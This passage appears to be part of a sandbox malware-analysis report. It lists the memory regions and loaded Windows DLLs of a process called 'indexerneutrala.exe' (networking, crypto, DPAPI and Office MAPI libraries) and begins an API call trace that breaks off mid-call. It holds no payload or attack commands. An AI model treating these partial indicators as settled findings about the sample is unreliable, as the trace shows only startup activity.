end_va = 0x7fff5e1bffff entry_point = 0x0 region_type = private name = "private_0x00007fff5e1b0000" filename = "" Region: id = 4496 start_va = 0x7fff9df80000 end_va = 0x7fff9dfb5fff entry_point = 0x7fff9df80000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 4497 start_va = 0x7fff9e2e0000 end_va = 0x7fff9e43bfff entry_point = 0x7fff9e2e0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 4498 start_va = 0x72cf0000 end_va = 0x72edffff entry_point = 0x72cf0000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\SysWOW64\\DWrite.dll" (normalized: "c:\\windows\\syswow64\\dwrite.dll") Region: id = 4499 start_va = 0xb184950000 end_va = 0xb18495ffff entry_point = 0x0 region_type = private name = "private_0x000000b184950000" filename = "" Region: id = 4500 start_va = 0xb184960000 end_va = 0xb184b0bfff entry_point = 0xb184960000 region_type = mapped_file name = "msointl.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\MSOINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\msointl.dll") Region: id = 4501 start_va = 0x7fff94040000 end_va = 0x7fff94298fff entry_point = 0x7fff94040000 region_type = mapped_file name = "dwrite.dll" filename = "\\Windows\\System32\\DWrite.dll" (normalized: "c:\\windows\\system32\\dwrite.dll") Region: id = 4518 start_va = 0x72ad0000 end_va = 0x72ce2fff entry_point = 0x72ad0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\SysWOW64\\d3d11.dll" (normalized: "c:\\windows\\syswow64\\d3d11.dll") Region: id = 4519 start_va = 0xb184820000 end_va = 0xb18489ffff entry_point = 0x0 region_type = private name = "private_0x000000b184820000" filename = "" Region: id = 4520 start_va = 0x7ff66face000 end_va = 0x7ff66facffff entry_point = 0x0 region_type = private name = "private_0x00007ff66face000" filename = "" Region: id = 4521 start_va = 0x7fff999b0000 end_va = 0x7fff99c52fff entry_point = 0x7fff999b0000 region_type = mapped_file name = "d3d11.dll" filename = "\\Windows\\System32\\d3d11.dll" (normalized: "c:\\windows\\system32\\d3d11.dll") Region: id = 4528 start_va = 0x728b0000 end_va = 0x72ac7fff entry_point = 0x728b0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\SysWOW64\\d3d10warp.dll" (normalized: "c:\\windows\\syswow64\\d3d10warp.dll") Region: id = 4529 start_va = 0x7fff996a0000 end_va = 0x7fff9990dfff entry_point = 0x7fff996a0000 region_type = mapped_file name = "d3d10warp.dll" filename = "\\Windows\\System32\\d3d10warp.dll" (normalized: "c:\\windows\\system32\\d3d10warp.dll") Region: id = 4530 start_va = 0x738b0000 end_va = 0x738bafff entry_point = 0x738b0000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 4531 start_va = 0x738c0000 end_va = 0x738d9fff entry_point = 0x738c0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 4532 start_va = 0xb1848a0000 end_va = 0xb1848c9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1848a0000" filename = "" Region: id = 4533 start_va = 0xb1848d0000 end_va = 0xb1848d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1848d0000" filename = "" Region: id = 4534 start_va = 0xb1848e0000 end_va = 0xb1848e0fff entry_point = 0x0 region_type = private name = "private_0x000000b1848e0000" filename = "" Region: id = 4535 start_va = 0xb1848f0000 end_va = 0xb1848f0fff entry_point = 0x0 region_type = private name = "private_0x000000b1848f0000" filename = "" Region: id = 4536 start_va = 0xb184b10000 end_va = 0xb184c0ffff entry_point = 0x0 region_type = private name = "private_0x000000b184b10000" filename = "" Region: id = 4537 start_va = 0x7ff66facc000 end_va = 0x7ff66facdfff entry_point = 0x0 region_type = private name = "private_0x00007ff66facc000" filename = "" Region: id = 4538 start_va = 0x7fff95a30000 end_va = 0x7fff95a3bfff entry_point = 0x7fff95a30000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 4539 start_va = 0x7fff98080000 end_va = 0x7fff9809ffff entry_point = 0x7fff98080000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 4745 start_va = 0x73820000 end_va = 0x73833fff entry_point = 0x73820000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc.dll") Region: id = 4746 start_va = 0x73870000 end_va = 0x73882fff entry_point = 0x73870000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\SysWOW64\\dhcpcsvc6.dll" (normalized: "c:\\windows\\syswow64\\dhcpcsvc6.dll") Region: id = 4747 start_va = 0x73da0000 end_va = 0x73e46fff entry_point = 0x73da0000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 4748 start_va = 0x73e50000 end_va = 0x73e57fff entry_point = 0x73e50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 4749 start_va = 0x73e60000 end_va = 0x73e8ffff entry_point = 0x73e60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 4750 start_va = 0x73f30000 end_va = 0x74153fff entry_point = 0x73f30000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 4751 start_va = 0x74180000 end_va = 0x74440fff entry_point = 0x74180000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 4752 start_va = 0x74450000 end_va = 0x745affff entry_point = 0x74450000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 4753 start_va = 0x74610000 end_va = 0x74619fff entry_point = 0x74610000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 4754 start_va = 0x74620000 end_va = 0x7463dfff entry_point = 0x74620000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 4755 start_va = 0xb184900000 end_va = 0xb184900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b184900000" filename = "" Region: id = 4756 start_va = 0xb184910000 end_va = 0xb184910fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b184910000" filename = "" Region: id = 4757 start_va = 0xb184920000 end_va = 0xb184920fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b184920000" filename = "" Region: id = 4758 start_va = 0xb184930000 end_va = 0xb184930fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b184930000" filename = "" Region: id = 4759 start_va = 0xb184940000 end_va = 0xb184940fff entry_point = 0xb184940000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\system32\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 4760 start_va = 0xb184c10000 end_va = 0xb184c8ffff entry_point = 0x0 region_type = private name = "private_0x000000b184c10000" filename = "" Region: id = 4761 start_va = 0xb184c90000 end_va = 0xb184d0ffff entry_point = 0x0 region_type = private name = "private_0x000000b184c90000" filename = "" Region: id = 4762 start_va = 0xb184d10000 end_va = 0xb184d8ffff entry_point = 0x0 region_type = private name = "private_0x000000b184d10000" filename = "" Region: id = 4763 start_va = 0xb184d90000 end_va = 0xb184e8ffff entry_point = 0x0 region_type = private name = "private_0x000000b184d90000" filename = "" Region: id = 4764 start_va = 0xb184e90000 end_va = 0xb184f0ffff entry_point = 0x0 region_type = private name = "private_0x000000b184e90000" filename = "" Region: id = 4765 start_va = 0xb184f10000 end_va = 0xb184f8ffff entry_point = 0x0 region_type = private name = "private_0x000000b184f10000" filename = "" Region: id = 4766 start_va = 0xb184f90000 end_va = 0xb18500ffff entry_point = 0x0 region_type = private name = "private_0x000000b184f90000" filename = "" Region: id = 4767 start_va = 0xb185010000 end_va = 0xb1852c5fff entry_point = 0xb185010000 region_type = mapped_file name = "mapir.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\MAPIR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\mapir.dll") Region: id = 4768 start_va = 0xb1852d0000 end_va = 0xb1853cffff entry_point = 0x0 region_type = private name = "private_0x000000b1852d0000" filename = "" Region: id = 4769 start_va = 0x7ff66fac0000 end_va = 0x7ff66fac1fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fac0000" filename = "" Region: id = 4770 start_va = 0x7ff66fac2000 end_va = 0x7ff66fac3fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fac2000" filename = "" Region: id = 4771 start_va = 0x7ff66fac4000 end_va = 0x7ff66fac5fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fac4000" filename = "" Region: id = 4772 start_va = 0x7ff66fac6000 end_va = 0x7ff66fac7fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fac6000" filename = "" Region: id = 4773 start_va = 0x7ff66fac8000 end_va = 0x7ff66fac9fff entry_point = 0x0 region_type = private name = "private_0x00007ff66fac8000" filename = "" Region: id = 4774 start_va = 0x7ff66faca000 end_va = 0x7ff66facbfff entry_point = 0x0 region_type = private name = "private_0x00007ff66faca000" filename = "" Region: id = 4775 start_va = 0x7fff92950000 end_va = 0x7fff92bf6fff entry_point = 0x7fff92950000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 4776 start_va = 0x7fff93790000 end_va = 0x7fff9379dfff entry_point = 0x7fff93790000 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 4777 start_va = 0x7fff93a50000 end_va = 0x7fff93a64fff entry_point = 0x7fff93a50000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 4778 start_va = 0x7fff93db0000 end_va = 0x7fff93f46fff entry_point = 0x7fff93db0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 4779 start_va = 0x7fff942a0000 end_va = 0x7fff942defff entry_point = 0x7fff942a0000 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 4780 start_va = 0x7fff95940000 end_va = 0x7fff95a15fff entry_point = 0x7fff95940000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 4781 start_va = 0x7fff964d0000 end_va = 0x7fff96845fff entry_point = 0x7fff964d0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 4782 start_va = 0x7fff96880000 end_va = 0x7fff96899fff entry_point = 0x7fff96880000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 4783 start_va = 0x7fff97bb0000 end_va = 0x7fff97bc5fff entry_point = 0x7fff97bb0000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 4784 start_va = 0x7fff99270000 end_va = 0x7fff9927afff entry_point = 0x7fff99270000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 4785 start_va = 0x7fff99290000 end_va = 0x7fff992c7fff entry_point = 0x7fff99290000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 4786 start_va = 0x7fff9b0b0000 end_va = 0x7fff9b0e2fff entry_point = 0x7fff9b0b0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 4787 start_va = 0x7fff9b460000 end_va = 0x7fff9b476fff entry_point = 0x7fff9b460000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 4788 start_va = 0x7fff9b5d0000 end_va = 0x7fff9b5dafff entry_point = 0x7fff9b5d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4789 start_va = 0x7fff9b7b0000 end_va = 0x7fff9b7dbfff entry_point = 0x7fff9b7b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4790 start_va = 0x7fff9e440000 end_va = 0x7fff9e447fff entry_point = 0x7fff9e440000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4791 start_va = 0x7fff9eea0000 end_va = 0x7fff9eea6fff entry_point = 0x7fff9eea0000 region_type = mapped_file name = "normaliz.dll" filename = "\\Windows\\System32\\normaliz.dll" (normalized: "c:\\windows\\system32\\normaliz.dll") Region: id = 4792 start_va = 0x7fff9eeb0000 end_va = 0x7fff9ef18fff entry_point = 0x7fff9eeb0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4793 start_va = 0x7fff9f110000 end_va = 0x7fff9f1b4fff entry_point = 0x7fff9f110000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4794 start_va = 0xb1853d0000 end_va = 0xb185bcffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b1853d0000" filename = "" Region: id = 4795 start_va = 0xb185bd0000 end_va = 0xb185bd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b185bd0000" filename = "" Region: id = 4796 start_va = 0xb185be0000 end_va = 0xb185be1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b185be0000" filename = "" Region: id = 4809 start_va = 0x73cc0000 end_va = 0x73d43fff entry_point = 0x73cc0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 4810 start_va = 0xb185bf0000 end_va = 0xb1863effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b185bf0000" filename = "" Region: id = 4811 start_va = 0xb1863f0000 end_va = 0xb1864f0fff entry_point = 0x0 region_type = private name = "private_0x000000b1863f0000" filename = "" Region: id = 4812 start_va = 0x7fff9b200000 end_va = 0x7fff9b2a7fff entry_point = 0x7fff9b200000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4813 start_va = 0x7fff9af30000 end_va = 0x7fff9af61fff entry_point = 0x7fff9af30000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4819 start_va = 0x7fff82b40000 end_va = 0x7fff82e4afff entry_point = 0x7fff82b40000 region_type = mapped_file name = "riched20.dll" filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\RICHED20.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\riched20.dll") Region: id = 4820 start_va = 0x7fff9b400000 end_va = 0x7fff9b45cfff entry_point = 0x7fff9b400000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4830 start_va = 0x72840000 end_va = 0x728a7fff entry_point = 0x72840000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\SysWOW64\\webio.dll" (normalized: "c:\\windows\\syswow64\\webio.dll") Region: id = 4831 start_va = 0xb1863f0000 end_va = 0xb1863f4fff entry_point = 0xb1863f0000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\SysWOW64\\winnlsres.dll" (normalized: "c:\\windows\\syswow64\\winnlsres.dll") Region: id = 4832 start_va = 0xb186400000 end_va = 0xb18640ffff entry_point = 0xb186400000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\winnlsres.dll.mui") Region: id = 4833 start_va = 0xb186410000 end_va = 0xb186410fff entry_point = 0x0 region_type = private name = "private_0x000000b186410000" filename = "" Region: id = 4834 start_va = 0xb186420000 end_va = 0xb186420fff entry_point = 0x0 region_type = private name = "private_0x000000b186420000" filename = "" Region: id = 4835 start_va = 0x7fff93600000 end_va = 0x7fff9367ffff entry_point = 0x7fff93600000 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 4836 start_va = 0x7fff94e00000 end_va = 0x7fff94e09fff entry_point = 0x7fff94e00000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 4837 start_va = 0x7fff969b0000 end_va = 0x7fff96a17fff entry_point = 0x7fff969b0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 4844 start_va = 0xb185010000 end_va = 0xb185012fff entry_point = 0xb185010000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 4845 start_va = 0xb185020000 end_va = 0xb185021fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000b185020000" filename = "" Region: id = 4846 start_va = 0xb185030000 end_va = 0xb185039fff entry_point = 0xb185030000 region_type = mapped_file name = "crypt32.dll.mui" filename = "\\Windows\\System32\\en-US\\crypt32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\crypt32.dll.mui") Region: id = 4847 start_va = 0xb185040000 end_va = 0xb18513ffff entry_point = 0x0 region_type = private name = "private_0x000000b185040000" filename = "" Region: id = 4848 start_va = 0xb185140000 end_va = 0xb18523ffff entry_point = 0x0 region_type = private name = "private_0x000000b185140000" filename = "" Region: id = 4849 start_va = 0xb1853d0000 end_va = 0xb1857cffff entry_point = 0x0 region_type = private name = "private_0x000000b1853d0000" filename = "" Region: id = 4850 start_va = 0x7ff66fabc000 end_va = 0x7ff66fabdfff entry_point = 0x0 region_type = private name = "private_0x00007ff66fabc000" filename = "" Region: id = 4851 start_va = 0x7ff66fabe000 end_va = 0x7ff66fabffff entry_point = 0x0 region_type = private name = "private_0x00007ff66fabe000" filename = "" Region: id = 4852 start_va = 0x7fff91710000 end_va = 0x7fff91723fff entry_point = 0x7fff91710000 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 4853 start_va = 0x7fff92280000 end_va = 0x7fff9229efff entry_point = 0x7fff92280000 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 4854 start_va = 0x7fff9ab10000 end_va = 0x7fff9ab32fff entry_point = 0x7fff9ab10000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4855 start_va = 0x7fff9af90000 end_va = 0x7fff9b003fff entry_point = 0x7fff9af90000 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 4856 start_va = 0x7fff9b660000 end_va = 0x7fff9b695fff entry_point = 0x7fff9b660000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 4857 start_va = 0x7fff9b6a0000 end_va = 0x7fff9b6c5fff entry_point = 0x7fff9b6a0000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 4858 start_va = 0x7fff9bc20000 end_va = 0x7fff9bc30fff entry_point = 0x7fff9bc20000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4859 start_va = 0x7fff9c2c0000 end_va = 0x7fff9c480fff entry_point = 0x7fff9c2c0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4860 start_va = 0x73910000 end_va = 0x73919fff entry_point = 0x73910000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 4861 start_va = 0x7fff93940000 end_va = 0x7fff9394bfff entry_point = 0x7fff93940000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 4864 start_va = 0x73920000 end_va = 0x73927fff entry_point = 0x73920000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\SysWOW64\\dpapi.dll" (normalized: "c:\\windows\\syswow64\\dpapi.dll") Region: id = 4865 start_va = 0x7fff9b010000 end_va = 0x7fff9b019fff entry_point = 0x7fff9b010000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Thread: id = 528 os_tid = 0x2b8 [0252.238] GetStartupInfoW (in: lpStartupInfo=0xb1fd92f8b0 | out: lpStartupInfo=0xb1fd92f8b0*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutrala.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0252.238] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7fff9c9a0000 [0252.238] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsAlloc") returned 0x7fff9c9c02a0 [0252.238] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsFree") returned 0x7fff9c9c23f0 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsGetValue") returned 0x7fff9c9b63c0 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlsSetValue") returned 0x7fff9c9bd920 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="InitializeCriticalSectionEx") returned 0x7fff9c9c5620 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateEventExW") returned 0x7fff9c9c5580 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateSemaphoreExW") returned 0x7fff9c9c55e0 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetThreadStackGuarantee") returned 0x7fff9c9c0e10 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateThreadpoolTimer") returned 0x7fff9c9bf110 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetThreadpoolTimer") returned 0x7fff9f1fcb10 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x7fff9f205790 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CloseThreadpoolTimer") returned 0x7fff9f1fea10 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateThreadpoolWait") returned 0x7fff9c9c28c0 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetThreadpoolWait") returned 0x7fff9f1fc470 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CloseThreadpoolWait") returned 0x7fff9f205410 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FlushProcessWriteBuffers") returned 0x7fff9f2542f0 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7fff9f2395e0 [0252.239] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetCurrentProcessorNumber") returned 0x7fff9f253130 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetLogicalProcessorInformation") returned 0x7fff9c9c0fb0 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CreateSymbolicLinkW") returned 0x7fff9c9e2720 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetDefaultDllDirectories") returned 0x7fff9c76e7a0 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="EnumSystemLocalesEx") returned 0x7fff9c9e28e0 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="CompareStringEx") returned 0x7fff9c9b6010 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetDateFormatEx") returned 0x7fff9c9e2a00 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetLocaleInfoEx") returned 0x7fff9c9c0310 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetTimeFormatEx") returned 0x7fff9c9e2bc0 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetUserDefaultLocaleName") returned 0x7fff9c9c25d0 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="IsValidLocaleName") returned 0x7fff9c9e2cd0 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="LCMapStringEx") returned 0x7fff9c9b6000 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetCurrentPackageId") returned 0x7fff9c7045e0 [0252.240] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetTickCount64") returned 0x7fff9c9b65a0 [0252.241] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0252.241] GetProcAddress (hModule=0x7fff9c9a0000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0252.241] GetCurrentThreadId () returned 0x2b8 [0252.241] GetStartupInfoW (in: lpStartupInfo=0xb1fd92f8a0 | out: lpStartupInfo=0xb1fd92f8a0*(cb=0x68, lpReserved="", lpDesktop="", lpTitle="C:\\Windows\\SysWOW64\\indexerneutrala.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x140000000, hStdOutput=0x140008170, hStdError=0xb1fd9810e0)) [0252.241] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0252.241] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0252.241] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0252.241] GetCommandLineA () returned="\"C:\\Windows\\SysWOW64\\indexerneutrala.exe\" \"C:\\Windows\\TEMP\\3595.tmp\"" [0252.242] GetEnvironmentStringsW () returned 0xb1fd982070* [0252.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1316, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 